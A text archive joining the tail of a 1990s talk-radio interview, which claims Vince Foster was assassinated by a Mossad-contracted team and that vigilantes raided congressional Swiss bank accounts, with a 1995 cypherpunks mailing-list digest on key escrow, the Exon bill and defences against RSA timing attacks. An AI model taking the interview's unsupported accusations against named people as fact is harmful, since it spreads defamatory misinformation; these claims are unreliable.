parade of people coming by his office in the White House saying, 
"Hey, how'd your weekend go, Vince? You cool with this? I mean, 
you on board with all of this? Everything okay?" you know. Then,... 

QUINN: A lot of very nervous people in the White House. 

NORMAN: That's right. Then, the day he died he had like a two-hour 
meeting with another person from the Arkansas contingent there. I 
think the problem was that they were afraid that Vince was going 
to talk or that he was going to crack under questioning, and 
here's a guy who was now, at this point, under intense 
surveillance. I mean, he had not only CIA counter intelligence 
people, but you had NSA. You had FBI surveilling him. There was a 
four-person IRS team we know was assigned to tail this guy, 
probably in connection with the money laundering aspect of the 
Swiss bank account. 

QUINN: God, this thing's got everything but floats in the... I 
mean all they need is Goofy, a big balloon with ropes on it 
following this guy around. 

NORMAN: You almost did. I mean, you had the Secret Service with 
a bomb-sniffing dog squad out there checking his car in the 
parking lot. The video tapes of that, gone. The video tapes of the 
room where they are stored, gone. I mean, this whole thing is 
massively covered up, and I guess it is for national security
reasons. 

QUINN: Well now, I understand that Foster had a meeting scheduled 
with Bill Clinton. I believe it was on a Wednesday. 

NORMAN: Right. 

QUINN: And, it was the Tuesday he was killed. 

NORMAN: Right. Exactly. The question is well, gee, was he going 
to drop something in the President's lap and blow the plausible 
deniability that he might have on this stuff. 

QUINN: Well, this Foster suicide thing is so sloppy. It leads me 
to believe that on Tuesday they thought he would take the money 
and shut up, and he didn't take it so they had to do something 
real quick. 

NORMAN: Well, that could be it or that even if he wanted to shut 
up maybe they were afraid he would crack under interrogation or 
something. You know, it is just somebody wanted him real dead, 
and there is a bunch of people who had ample reason for it. This 
was not suicide. It was not over depression. This was a political 
assassination carried out on U.S. soil by a foreign government. 
The Israelis were involved in this. There was apparently a three-
person Mossad-contracted team that went into the apartment that 
Foster had gone to that afternoon where he was apparently lured 
by a female person from the White House staff who I think still 
works in the White House. 

QUINN: Now, who would that be? 

NORMAN: Well, I... 

QUINN: Because, he had sex with her? 

NORMAN: That's the impression, yeah. 

QUINN: I mean, there was semen on his shorts. There was brownish-
blonde hair on his clothing and rug fibers all over him which may 
or may not have had to do with having sex on the floor. It might 
have been... 

NORMAN: No, I think that was because he was rolled up in a rug 
afterwards and taken over to Fort Marcy Park. Now, the question 
is, were elements of our intelligence community involved in 
helping to dispose of the body and cover it up some way? 

QUINN: Who is the woman in the White House? 

NORMAN: I can't say. 

QUINN: Patsy Thomason? 

NORMAN: No. I don't want to say. I suspect... 

QUINN: Dee Dee. Well, she's not there anymore. 

NORMAN: That name is known. I mean, she has been identified on 
these tapes apparently, but.... 

QUINN: I think Dee Dee and Bill are doing it, but that's just me. 
Anyway, let's get back to the story here. Okay, so I understand 
at least you are claiming that there is a videotape of Foster's 
murder? 

NORMAN: Well, of the people entering and leaving this apartment a 
few blocks from the White House where it apparently occurred. 

QUINN: Has anybody located this apartment? Do you know where it 
is? 

NORMAN: I don't know exactly where it is myself. I am told it is 
actually within a few blocks of the White House. 

QUINN: Okay, so they lure him here, and they pop him, and there 
is a videotape of it or there is a videotape of the people going 
in and out. Then, they go to Fort Marcy Park, and they dump him. 

NORMAN: Right. 

QUINN: Okay, and we've got a witness now that says they saw the 
two guys that fit the same description that Patrick Knowlton, the 
other witness, to Foster's car. He describes the one guy that 
threatens him. One of those people is one of the two that 
supposedly was walking Foster, who looked drunk to this guy, 
into the park, but he says that they laid him out. 

NORMAN: Yeah. I don't know too much about all that stuff, but 
what I know is this, that Paul Rodriguez is the Editor of Insight 
Magazine, that came up with this Mr. X source. When Forbes decided 
not to run the story for reasons that were kind of mysterious to 
me at the time, and while I was still there, they gave me 
permission to publish it elsewhere. And, as I approached Insight, 
because they are kind of a gutsy magazine, David Rodriguez made a 
whole bunch of calls around Washington trying to corroborate this 
stuff, and I think he was making some headway. Then, he gets this 
visit in person from some military intelligence guy from the 
Pentagon who comes to him and says, "Paul, lay off this story. 
You don't know what you're dealing with here." 

QUINN: No. I think we do know what we are dealing with here. 
We're dealing with the biggest scandal since maybe... 

NORMAN: And, you've got Israeli relations at stake here. You know, 
the intelligence community has a lot of joint ventures with the 
Israelis. They don't want to "queer" those things. I mean, we do 
business with those people a lot, and you know a lot of it is 
probably quite necessary, but you know there is a scandal here 
that dwarfs the Jonathan Pollard case by orders of magnitude 
really. 

QUINN: I want to discuss a couple of things with you. First of 
all, now it would appear that a bunch of Republicans picking 
Kenneth Starr to put him in charge of this investigation of 
Vince Foster and the Whitewater problem in Washington, D.C. On 
the surface, it looked like they were going for the jugular, but 
see, Mr. Starr has some background that leads back to the Inslaw 
case we discussed earlier in the show about the Promis software 
and stuff. He excused himself from that litigation. 

NORMAN: And, the reason was because he was the inside counsel for 
William French Smith at the Justice Department in 1982 at the 
time that the Inslaw software was expropriated by the government... 

QUINN: Okay. So he really is not in the position to be the pit 
bull to expose this. He is in a better position to get Clinton on 
whatever Republicans need to get him on and make sure that 
Republicans don't get burned here.
 
NORMAN: I think that's it. Yeah. 

QUINN: Okay, now. Given that that's the case and given that the 
Washington inside-the-beltway crowd on both sides of the aisle 
are trying to make sure that the fix is in on this, how do you 
think or what leads you to believe that this is going to come out, 
and through what channels? 

NORMAN: Well, again, it goes back to resources of mine. 
Basically, there are a few good guys in the intelligence 
community, particularly this handful of people in the so-called
Fifth Column, who are so incensed about this bipartisan coverup, 
the government's inability and unwillingness to deal with the high-
level corruption here, they've just decided to take things into 
their own hands. They never had government authorization to go 
raid the foreign bank accounts, but.... 

QUINN: How many accounts are there? How many people in the 
government right now have Swiss bank accounts filled with money 
from BCCI, drug laundering, defense kickbacks, arms trades, I 
mean all of this nonsense? 

NORMAN: Not as many as two years ago. These guys have been out 
raiding these accounts. They've pulled back $2.5 billion, more 
than $2.5 billion with a "B" dollars from 300, 400, 500 of these 
accounts. There is probably 3,000 coded Swiss and other foreign 
bank accounts that they have been rifling through the computers on. 

QUINN: How can there be this many of them and it doesn't come out? 

NORMAN: It is because it is endemic corruption. The government is 
corrupt. Why should we give the President of South Korea $600 
million? ... country more powerful, more worth corrupting, more 
venal and with weaker controls for policing this stuff. 

QUINN: Well, because we don't believe it can happen here. 

NORMAN: That's right. We're Americans. Well, this is greed and 
money. But, there is.... 

QUINN: Well, it's murder too. 

NORMAN: That's right, and there have been hundreds of these 
accounts already raided, and nobody, NOBODY has been able to stand 
up and say, "I was robbed." Why? Because, the money came from 
exactly what you said -- kickbacks on drugs, kickbacks on arms, 
insider trading, and they never paid any taxes on this stuff. 
They've never disclosed it, and the minimum sentence for willful 
tax evasion is ten years, that's the minimum. So, what you have 
going on right now in Congress is basically, there is an Angel of 
Death. Actually, there are two I'm told. There is one on the 
Democratic side and one on the Republican side. 

QUINN: Now, do they make their rounds together? 

NORMAN: No. It's separately. What I'm told is that the people in 
Congress with these Swiss bank accounts, who have had these 
accounts, if they haven't already left, if they haven't had the 
good sense to already get their butts out of there, they have been 
delivered, hand delivered a brown paper envelope with transaction 
records of their Swiss bank accounts, and within a day or so they 
get a visit from this Angel of Death who says it's time for you 
to go, time to do some career planning, you're out of here, we 
don't want you in the government when the stuff hits the fan here, 
as it's gonna do in the spring apparently. The records are going 
to start coming out. It's going to be obvious. These vigilantes 
are just going to take this situation into their own hands and 
release this stuff, I'm convinced. 

QUINN: These people are real patriots. They could end up dead 
doing this. 

NORMAN: Some of them may already have. I think... but they've 
planned this quite well. I think they've got it down now. They 
know that if anything happens to them, that the stuff would just 
come out in a gush, so it would be counterproductive for.... 

QUINN: Yeah, but I mean is it going to come out in the 
mainstream media. You've got the Mena story being spiked a year 
ago by Katherine Graham at the Washington Post, and I've uncov... 
you, what I stumbled on a memo from Paul Keiser yesterday from the 
editor at the Washington Post who writes me in this memo a flat 
out blatant lie. He says that the authors of the Mena story, that 
was supposed to run January 26, 1995, in the Washington Post 
Outlook Section, had withdrawn the article before the Washington 
Post had decided to run it, and that's just a flat out lie. 

NORMAN: Well, it's technically probably true. But, what they've 
done, they've left those people dangling by a thread for like 6-8 
months. I don't blame them for taking the story elsewhere as the.... 

QUINN: Yeah, but no, but Jim they didn't. The type galleys had 
been laid, and the artwork had been done. It was supposed... they 
didn't pull it until the Thursday before the Sunday it was 
supposed to run. 

NORMAN: Right. Well, technically the Post can say, "Oh, we never 
quieted you..." That's what they told me at Forbes, too, about my 
story. Finally, I never got a good reason why my story didn't run 
at Forbes. Ultimately, they said, "Oh, we didn't trust your 
sources." But, actually what my immediate supervisor said, "We 
can't say this about Systematics," which was a big advertiser at 
Forbes, and we can't say this about the Israelis. 

QUINN: Yeah, right. 

NORMAN: That's why it didn't run in Forbes. 

QUINN: Well, there's actually no proof that Systematics has 
deliberately delivered stolen software. I mean, they may not even 
know that the software was stolen, and it may be another version 
of it. 

NORMAN: Systematics is under heavy duty investigation, though, 
right now for money laundering, because once you set up a system 
for laundering covert funds for the government, who knows what 
else you can piggyback on top of that. The suspicion is that this 
was the quid pro quo here in return for laundering, supposedly, 
call it legitimate funds that the intelligence community can 
piggyback other stuff to. 

QUINN: Let's get back to the Angel of Death here and the 
resignations in Congress, which have been pretty much 
attributed by guys like Rush Limbaugh to the fact that Democrats 
just don't like being in the minority anymore, and they don't 
have the guts or stamina to stick it out the way the Republicans 
did for 40 years. And, some of that may be true, but how many of 
these people who have said that they are pulling their hats out 
of the ring... And, now we have two Republicans... How many of 
these people have been visited by this so-called Angel of Death? 
All of them? 

NORMAN: Well, the figures I've heard is that I think there's like 
25 or 26 so far since the last election who have decided they are 
not going to run again or had actually resigned and out of there, 
like Norman Minetta from Los Angeles[sic]. Of those, I'm told 
about 21 or 22 so far can be directly attributed to Swiss bank 
account problems. There is probably another dozen or so that 
are going to go that way. Again, there is an argument that, "Oh, 
we just can't stand the nasty politics in Washington anymore." 
Come on, give me a break. 

QUINN: Well, I like Patsy Schroeder. She wanted us to believe 
that now that the Democratic party is in such good shape she can 
leave it and it doesn't... did you see that? 

NORMAN: No.... 

QUINN: That was great. Oh yeah, now that.... 

NORMAN: Patsy Schroeder, somebody noted on the Internet that at 
the news conference where she was announcing she wasn't going to 
run, there had already been re-elect Schroeder bumper stickers 
printed up. I mean, she... take this guy Ron Coleman from Texas, 
a Congressman down there. He made his announcement at his 
supposed re-election campaign kickoff party. 

QUINN: You're kidding? This is right out of a... this is a movie. 

NORMAN: That's right. Listen, these people have been confronted. 
They've been given 24 hours basically to clean out their desks. 
That's what it amounts to. 

QUINN: So, they're gonna try and get all these people out who 
have Swiss bank accounts before it hits the fan. Now, when do you 
suppose that this is going to happen? Can you give us a timetable? 

NORMAN: Well, that's happening in tiers. I mean, we've already 
seen a bunch of departures. I think that the early spring is the 
timetable. You know, Wall Street is going to get hit with this 
stuff too. Now, every year in the spring, soon after the first of 
the year, after these guys collect their year-end bonuses, you have 
a big exodus. But, I'm told Wall Street is going to get hit with 
this big time this year because those guys were in it too. You 
gotta remember, there was so much money sloshing around here... 

QUINN: Yeah, really. 

NORMAN: ... from arms deals. You could not launder all of that 
money without the knowing, willing cooperation and participation 
of major banks, major brokerage houses, and... 

QUINN: Goldman Sachs possibly? 

NORMAN: Oh yeah. Look, Goldman... 

QUINN: I always found it strange that Robert Rubin showed up when 
he did. 

NORMAN: This Goldman, they were the chief investment bankers to 
Robert Maxwell in the U.K., helped Maxwell loot a half a billion 
dollars out of his pension funds, and it now costs a huge amount 
of money for a settlement there. 

QUINN: It sounds like somebody's calling you. 

NORMAN: They still have the bond for ADFA, the Arkansas Development... 

QUINN: Whoa, hold on a second. What's that? 

NORMAN: That's another one of these... 

QUINN: Well no, I know what it is. You're telling me that Goldman 
Sachs was holding the bonds for the Arkansas Development? 

NORMAN: No, they were the underwriter on a bunch of these $8 
billion or so of bonds that ADFA marketed to who knows whom. 

QUINN: Oh man. You know, I have transactions on my desk at home, 
$80 million of money transfers to the Fuji Bank in the Cayman 
Islands from ADFA, the Arkansas Development Financial Authority, 
who I believe never had more than $8 million to begin with. I 
mean, where did they get $80 million, and what's it going to the 
Fuji Bank for? The interest rate? Come on, the Switzerland of the 
Caribbean. Jim, I gotta let you go. I gotta wrap this up here, 
but I want to thank you for joining us this morning. 

NORMAN: It's a pleasure. I'll keep you posted as more develops. 
There's going to be more coming down the pike here soon. 

QUINN: Well, I'll tell you what. I'm gonna call you later on 
today. I'll give you my home number. Let's stay in touch because 
if what you say is true and if there are truly some patriots in 
the intelligence community who are finally going to blow the 
whistle on this. By the way, all of these resignations and the 
Angel of Death and all of this, I think is evidence that these 
people know that this is inevitable that this is going to come 
out. 

NORMAN: It's like AIDS. I think there are a bunch of people back 
before the last election who realized they, in fact, have slept 
with the wrong woman or person, and they did not run again, but 
there has been denial, denial, denial by a bunch of these people. 
Finally, I think it's like the Angel of Death is finally coming
around saying, "You gotta go. Bye. You're outta here." 

*************************** CREDITS******************************

If you are a talk show host and want to contact either one of 
these guys for an interview you can reach James Norman at MEDIA 
BYPASS MAGAZINE, 1-800-4-BYPASS 

Jim Quinn can be contacted at WRRK, 7 Parkway Center, Suite 780, 
Pittsburgh, PA 15220, Fax Number 412-928-9290, Internet address 
is quinn@sgi.net homepage at http://www.warroom.com or Compuserve
72662,3507.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 13 Dec 1995 11:34:09 +0800
To: REES@rmcs.cranfield.ac.uk
Subject: Re: Plea for information
Message-ID: <Pine.BSD.3.91.951211221025.27737B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 12 07 95 you sent a Plea for information to cypherpunks@toad.com. 
 
You said: 
 
  I would be interested in learning more about the politics and 
  mathematics of cryptography.... 
 
  [snip] 
 
  ...I would like to know how best to understand cryptography - 
  I have a textbook on the basic mathematical concepts underlying 
  the techniques but it is too advanced for my current 
  knowledge in this field (A-level - ie. end of high school), 
  please can you suggest a good starting place for me. 
 
 
I suggest you lay aside the maths for a time and buy a copy 
of: 
 
    Bruce Schneier 
    E-Mail Security. How to Keep Your Electronic Messages 
      Private 
    John Wiley & Sons, Inc 
    1995 
 
 
I enquired this morning at Wiley's NY office and was told: 
 
    (a) the book is available in the UK 
 
    (b) the phone number of Wiley's Chichester office is 
 
                44 1243 779 777 
 
 
Here's the book's Contents in Brief: 
 
Part I:  Privacy and Electronic Mail 
             Chapter   1: The Problem 
             Chapter   2: Encryption 
             Chapter   3: Key Management 
             Chapter   4: Authentication 
             Chapter   5: Certificates 
             Chapter   6: Keeping Your Private Key Private 
             Chapter   7: Odds and Ends 
             Chapter   8: Patents, Governments, and Export Laws 
 
Part II: Achieving Electronic-Mail Privacy 
             Chapter   9: Requirements and Features 
             Chapter  10: Privacy Enhanced Mail (PEM) 
             Chapter  11: Pretty Good Privacy (PGP) 
             Chapter  12: Comparing PGP and PEM 
             Chapter  13: Attacks Against PGP and PEM 
 
Appendix A: Pretty Good Privacy 
Appendix B: Privacy Enhanced Mail 
Index 
 
 
Appendix A = PGP User's Guide. Volume I: Essential Topics. 
Appendix B = Request for Comments: 1421. 
 
 
To study the book --not the same thing as just reading it-- 
you will need PGP to experiment with.  An ingenious lad 
should have little trouble... 
 
After you have some concrete experience, it'll be easier to 
see the relevance of the maths. 
 
As regards "the politics...of cryptography," this excerpt 
from the book's Foreword by William Murray should pique your 
interest: 
 
  To the extent that E-mail proves to be important, we can 
  expect to see many attempts on the part of government 
  to coopt it in much the same way that they have coopted 
  the paper mail system.  The excuses that it will use to 
  do so will be related to security.  It will repeat the 
  claim of Cromwell's government ["many dangerous and wicked 
  designs...are daily contrived against the welfare of 
  this Commonwealth"] and will create whatever evidence is 
  required to convince the people of the validity of the 
  claim. Arguments to the contrary notwithstanding, the real 
  motive will be to maintain political control and influence. 
 
 
Oklahoma?  Whatever... 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 13 Dec 1995 11:34:00 +0800
To: cypherpunks@toad.com
Subject: RE: ViaCrypt supports CKE in PGP
Message-ID: <80361.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Mon, 11 Dec 1995 14:45:55 -0600,
  "Robichaux, Paul E" <perobich@ingr.com>  writes:

> In today's mailbox I got a pack of marketing slicks from ViaCrypt.
[liberally elided]
> The biggie, though, are these:
> "Encryption automatically includes Corporate Access Key as
> additional  recipient (option)" and
> "Key selection/display dialogs show only keys certified by
> Corporate  Access Key (option)"
> So, real CKE will soon be available from an unexpected source. I'm not
> sure  whether to be excited or dismayed.


I believe this is a good thing (tm).
This is a vendor with strong crypto implementing Key Escrow for
the only known commercially viable market: data recovery of long
term storage.

In all of the NIST meetings that I've attended, industry says
there is a market for key escrow for data recovery when your
key programmer "falls in love and moves to a warm water island"

They also say there is no market for key escrow for communication,
we can simply resend lost messages.

Commercial Key Escrow is, by definition, voluntary. You have to pay
to get it escrowed, stored, and returned. CKE is not GAK.

I bet it's not exportable.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Thu, 14 Dec 1995 12:50:44 +0800
To: cypherpunks@toad.com
Subject: Re[2]: Timing Cryptanalysis Attack
Message-ID: <9511118187.AA818747282@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     OTOH, maybe we _should_ try for constant computation time and then try 
     for *random* delay time.  Remember that _we_ will spend a lot of real 
     time arguing whether the *random* delay is really _random_
     
     Martin G. Diehl
     
     
     _______________________ Reply Separator __________________________ 
     Subject: Re: Timing Cryptanalysis Attack
     Author:  Nathaniel Borenstein <nsb+limbo@nsb.fv.com> at Internet-usa 
     Date:    12/11/95 2:41 PM
     
     
     Hey, don't go for constant time, that's too hard to get perfect.  Add 
     a *random* delay.  This particular crypto-flaw is pretty easy to fix. 
     (See, I'm not *always* arguing the downside of cryptography!)
     
     It is worth noting, however, the extent to which "secure" 
     cryptographic protocols keep needing to get fixed one last time....  
     -- Nathaniel --------
     Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn) 
     Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
     FAQ & PGP key: nsb+faq@nsb.fv.com       | 
     http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 13 Dec 1995 05:54:07 +0800
To: Scott Binkley <SBinkley@atitech.ca>
Subject: Re: EXON
In-Reply-To: <E343943A01502C79@-SMF->
Message-ID: <Pine.ULT.3.91.951211225521.15475D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 11 Dec 1995, Scott Binkley wrote:

> Could someone please explain to me what this "EXON" thing is??

A nucleic acid chain (RNA or DNA) is composed of exons, which are 
"active" sequences of nucleotides that are expressed as polypeptides, and 
"introns," what is known as "junk DNA." Only about 2% of the 6 billion or 
so base pairs that make up the human genome are exons.

(There is some controversy in molecular biology circles as to whether 
"junk DNA" is really "junk" just because it doesn't build proteins. It 
could perform a regulatory or "frame-check" function.)

In cryptographic applications, the sequence of nucleotides can only be 
considered random inasmuch as the ratio of exon to intron is unknown.

Hence the inside joke. You see?

There is also a United States Senator James Exon, D-Nebraska I believe, who 
has introduced several restrictive and silly pieces of legislation 
concerning online privacy rights. "The Exon Bill" claims to hold individuals
and online service providers liable for the transmission of undefined 
"inappropriate" material, such as pornography.

So maybe that's what you've heard people talking about.

Information on Senator Exon is available at all the usual online freedom 
and privacy haunts:

eff.org
cdt.org
epic.org
aclu.org

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 14 Dec 1995 07:28:02 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <199512120654.WAA17948@ix12.ix.netcom.com>
Message-ID: <199512120743.XAA24011@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Besides, if you hack FV you've got the money :-)

	Uh, no you don't. I can't think of any ways you could hack FV
and actually make money at it, because in the end the credit card
would just get a chargeback.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 13 Dec 1995 11:33:35 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512120058.BAA25991@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" <perry@piermont.com> writes:

 > Timings like the ones listed are trivial to take in
 > establishing things like SSL sessions, or Photuris sessions.
 > The danger is to online protocols, not to PGP.

This must be a new and interesting definition of the word
"trivial" with which I was previously unfamiliar.

Quite frankly, I would be extremely surprised if anyone mounted a
successful hostile attack against a server's RSA certificate
using timings of remotely initiated SSL sessions outside of a
controlled laboratory environment.

"Timing Cryptanalysis" is one of those really cute "obvious with
20-20 hindsight" discoveries, but not one which is likely to be
reliably employed by an opponent except under very carefully
controlled circumstances.

Peter Trei and others have already outlined excellent reasons for
such skepticism, so I won't bother rehashing them here.

 > Any reason you felt you had to say this anonymously?

Yes.  I wanted to try the nifty WWW-based remailer at
http://www.replay.com/remailer/anon.html.  Also, it's nice to
have a pseudo-anonymous identity now that government regulation
of the Net is looming on the horizon. Feel free to compare my
writing style, margins, and quote string with other posts on the
list in order to determine my likely "real life" identity.

                                      -Bourbaki 137







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 13 Dec 1995 01:24:14 +0800
To: sameer@c2.org>
Subject: Hacking FV is just no fun (was Re: More FUD from First Virtual [NOISE])
In-Reply-To: <199512120743.XAA24011@infinity.c2.org>
Message-ID: <IknLod_Mc50eI2iw5O@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Watching this thread has been fascinating.  I want to underscore and
summarize a tiny bit.

First, I commented about the aspects of FV's system that made it
particularly hard to mount a large-scale automated attack against the FV
transaction system.  Then, David Wagner asked:

> Is it just me, or does this sound like a challenge?
.....
> Maybe Sameer will create a Hack FV page :-)
> Or maybe NB will offer a $1000 bug bounty to anyone who can successfully
> forge a transaction in FV's system (since it's so foolproof)...

Before I could answer, Sameer said more or less what I would have said,
although I'm sure he didn't think he was offering FV's position:

> 	FV isn't worth it.

This is absolutely true in the sense that a simple one-time attack on FV
is well-understood and easy to mount.  (For those of you who haven't
seen it, I recommend that you read our paper on lessons from First
Virtual's first full year in operation, available at
ftp::/ftp.fv.com/pub/nsb/fv-austin.{ps,txt}.  Among other things, it
spells out in precise detail how to break the FV transaction system --
see Appendix A, Question 25:  "How can a criminal break First Virtual's
system, and does it matter?")

Unlike other systems, FV doesn't claim to be "foolproof" -- quite the
contrary, we very deliberately tell you exactly how to break the system,
and we focus on limiting the damage that can be done by such an attack. 
Given that fact, a bounty is ludicrous.  We're not going to turn around
and pay you a bounty for doing exactly what we told you how to do!  A
bounty on crypto-payment-systems makes sense precisely because the
possible costs of a bug can be so high.

However, Sameer went on to write:

> 	Actually, Hack FV seems pretty pointless. Someone hacks FV,
> and a chargeback is issued on the credit card. Big deal. Same old
> outdated credit-card based payment systems.
> 	No more secure than credit cards.

This last line is not quite right.  The email loop that FV adds will, in
general, cause fraud to be detected far more quickly than it is detected
in today's credit card world.  Thus FV is a bit more robust (if not more
"secure", a word fraught with problems of definition) than the physical
credit card infrastructure.  Using encrypted credit cards on the net,
however, is demonstrably *less* secure/robust than the existing physical
credit card infrastructure, as the first-year paper also explains in
detail.

Finally, Bill and Sameer (jointly, sort of) provided a very brief
synopsis of the "does it matter?" part:

> > Besides, if you hack FV you've got the money :-)

> 	Uh, no you don't. I can't think of any ways you could hack FV
> and actually make money at it, because in the end the credit card
> would just get a chargeback.

FV is vulnerable to several nuisance attacks, and we make no bones about
that fact.  We've even seen it happen a couple of times -- no money was
lost, and the culprit was persuaded to cease and desist via pressure
through his ISP.  But we've designed the system to be very robust in
protecting the actual money, which is what we believe MUST be a payment
system's first priority.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 01:27:58 +0800
To: gibo@ripco.com (Giles Bowkett)
Subject: Re: Timing Attack Paper
In-Reply-To: <v01530501acf1028a30f2@[192.0.2.1]>
Message-ID: <199512121321.IAA02041@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Giles Bowkett writes:
> http://www.cryptography.com/timingattack.html
> 
> and found the whole thing to be totally incomprehensible from
> a layman's point of view.  I apologize for having not read
> "Applied Cryptography", which might have made the abstract a
> simpler read - but even if I had I'd have been baffled by a
> lot of the terminology and equations in this paper.

If you had read and understood Applied Cryptography you would
understand the paper. I'm sorry, but to paraphrase a smarter man than
I, there is no royal road to cryptography. You have to study it.

The only thing that can be said to a layman is that different keys
will require different amounts of time to deal with different texts
in certain public key systems, so by timing how long it takes to
perform operations you can get information about the keys.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@w3.org (Ben Combee)
Date: Wed, 13 Dec 1995 01:08:45 +0800
To: cypherpunks@toad.com
Subject: Re: EXON
In-Reply-To: <E343943A01502C79@-SMF->
Message-ID: <199512121612.KAA14837@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


> Could someone please explain to me what this "EXON" thing is??

EXON is a control character sent to some terminals to stop input and
output.  To restore normal mode, you send an EXOFF.  See an ASCII
chart for the exact figures.

(Yes, I am just being a little sarcastic.  But, you know, EXON would
stop input and output, so the analogy is a little scary... anyway,
Exon is a gas station, right?)
-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 01:21:21 +0800
To: jim@acm.org
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111920.LAA24338@mycroft.rand.org>
Message-ID: <199512121525.KAA09078@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim Gillogly wrote:

| > Nathaniel Borenstein <nsb@nsb.fv.com> writes:
| > Hey, don't go for constant time, that's too hard to get perfect.  Add a
| > *random* delay.  This particular crypto-flaw is pretty easy to fix. 
| > (See, I'm not *always* arguing the downside of cryptography!)
| 
| Random delay may be harder to get perfect than constant time.  Note that
| the actual time for the transaction is the minimum of all the transaction
| times you measure, since you can't add a negative delay to them.  It's
| presumably even easier if the random distribution is known.  Adding a
| random delay means more transactions are required to find each new bit,
| but information is still leaking.

	Does the delay have to be random, or does the total time for a
transaction need to be unrelated to the bits in the secret key?
Assume that the time added is pseudo-random (and confidential).
Further, for any non-overlapping group of N transactions, the
distribution of the times fits some predetermined curve, say a bell
curve.

	We've added a non random number, but since those numbers end
up being a curve, it would be difficult to determine which transaction
got which time added to it.  This resembles the 'make them all a
constant time', but allows us to send out some in a shorter time than
the maximum (although most transactions should probably take longer
than the average.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 13 Dec 1995 00:56:02 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC0D31.293C@netscape.com>
Message-ID: <Pine.SUN.3.91.951212104716.29421B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Jeff Weinstein wrote:

> 
>   While an exploit of this attack against our software has not
> been demonstrated, and there is some debate about whether it
> will even work, we are taking it very seriously.  We've been
> working with Paul to develop a fix, which we will implement
> even if the attack is never proven effective against our software.
> 

My gut & scribble-on-the-back-of-a-napkin feeling about this class of 
attack is that it could be a problem for smartcards (almost certainly), 
and possibly for non-routed networks (possibly - napkin was too small  
:-), but is not going to be viable on internetworks where routers are in 
use; if a packet enters a queue at any point in its path, then the 
transit time will be quantised by the time it drains the queue, which is 
basically controlled by the time it takes to drain previously queued 
packets; this will destroy any microsecond level correlations that may 
have been leaked. Ron is supposed to be doing a presentation at WWW IV 
later this week - hopefully he'll give his opinion on this.

Definitely a really neat hack, even if it isn't always practical.

Simon
p.s.

 Someone mentioned adding random timings instead of padding out to a 
constant time. This won't work (adding noise doesn't destroy a signal - 
just increases the effort needed to isolate it)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Dec 1995 05:29:44 +0800
To: cypherpunks@toad.com
Subject: Re: chaotic signal cryptography
Message-ID: <199512122008.MAA09312@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 12/12/95 +0100, Anonymous wrote:
